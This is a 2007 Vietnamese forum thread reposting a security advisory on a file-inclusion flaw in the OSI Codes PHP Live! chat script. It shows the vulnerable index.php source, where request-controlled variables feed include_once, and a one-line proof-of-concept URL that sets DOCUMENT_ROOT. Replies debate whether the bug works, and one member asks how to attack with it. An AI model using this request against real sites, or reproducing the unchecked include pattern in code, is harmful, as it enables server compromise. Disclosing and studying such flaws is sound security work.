osi codes - php live - .:: HVAOnline ::.

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thông tin new bugs và exploits

osi codes - php live

[Discussion] osi codes - php live	25/10/2007 21:02:43 (+0700) \| #1 \| 92867

zero_suto
Member

Joined: 01/09/2007 10:06:31
Messages: 6
Offline

From: Advisory_at_Aria-Security.Net, <Advisory_at_Aria-Security.Net>
Date: 23 Oct 2007 21:12:18 -0000
('binary' encoding is not supported, stored as-is) ________________________________

Aria-Security Team
http://Aria-Security.Net
Persian Security Network
________________________________

Source Code:

<?
/*******************************************************
* COPYRIGHT OSI CODES - PHP Live!
*******************************************************/
session_start() ;
$l = "" ;
// try to get cookie value first
if ( isset( $HTTP_COOKIE_VARS['COOKIE_PHPLIVE_SITE'] ) ) { $l = $HTTP_COOKIE_VARS['COOKIE_PHPLIVE_SITE'] ; }
if ( isset( $HTTP_GET_VARS['l'] ) ) { $l = $HTTP_GET_VARS['l'] ; }
if ( isset( $HTTP_POST_VARS['l'] ) ) { $l = $HTTP_POST_VARS['l'] ; }

if ( !file_exists( "./web/conf-init.php" ) )
{
HEADER( "location: setup/index.php" ) ;
exit ;
}
include_once("./web/conf-init.php") ;
if ( file_exists( "web/$l/$l-conf-init.php" ) && $l )
include_once("./web/$l/$l-conf-init.php") ;
include_once("$DOCUMENT_ROOT/API/Util_Error.php") ;
include_once("$DOCUMENT_ROOT/system.php") ;
include_once("$DOCUMENT_ROOT/lang_packs/$LANG_PACK.php") ;
include_once("$DOCUMENT_ROOT/web/VERSION_KEEP.php") ;
include_once("$DOCUMENT_ROOT/API/Util_CleanFiles.php") ;
include_once("$DOCUMENT_ROOT/API/sql.php" ) ;
include_once("$DOCUMENT_ROOT/API/Users/get.php") ;
include_once("$DOCUMENT_ROOT/API/Users/update.php") ;
include_once("$DOCUMENT_ROOT/API/Chat/remove.php") ;
include_once("$DOCUMENT_ROOT/API/ASP/get.php") ;
?>

Affected file: Index.php
Poc:
/index.php?DOCUMENT_ROOT=file.txt ?
Credits: Aria-Security
The-0utl4w
Received on Oct 24 2007

[Question] Re: osi codes - php live	25/10/2007 21:09:28 (+0700) \| #2 \| 92868

zero_suto
Member

Joined: 01/09/2007 10:06:31
Messages: 6
Offline

Em vừa thấy bug này trên 1 số web nhưng trên milwOrm vẫn chưa công bố .Xin mọi người cho biết ý kiến .Hính như sources này ở tranh freshmeat thì phải .

[Question] Re: osi codes - php live	26/10/2007 05:37:32 (+0700) \| #3 \| 92993

hoahongtim
Researcher

Joined: 15/07/2002 02:59:49
Messages: 156
Location: Underground
Offline

Đến nay lâu lắm rùi mà vẫn còn source bị dính PHP Included nhĩ ? smilie

hix !!

[Question] Re: osi codes - php live	26/10/2007 09:17:11 (+0700) \| #4 \| 93043

learn2hack
Elite Member

Joined: 29/06/2006 16:32:37
Messages: 825
Offline

Nếu như trong file cont-init.php có định nghĩa biến DOCUMENT_ROOT thì đâu có lỗi included nữa? Và nếu có dính lỗi, thì biến này sẽ được khai báo là 1 đường dẫn chứ sao lại là file.txt được nhỉ?

Blog: http://hontap.blogspot.com
Tải phần mềm miễn phí: http://www.taiphanmem.org

[Question] Re: osi codes - php live	19/11/2007 03:30:45 (+0700) \| #5 \| 98461

bonjovi288
Member

Joined: 03/09/2007 14:18:00
Messages: 2
Location: Metal
Offline

Cho phép em hỏi chút ạ!
Cái này dùng ra sao đây?
Cách tấn công như thế nào?
Mong các bậc trên giúp đỡ!
Thanks

Go to:

Users currently in here
1 Anonymous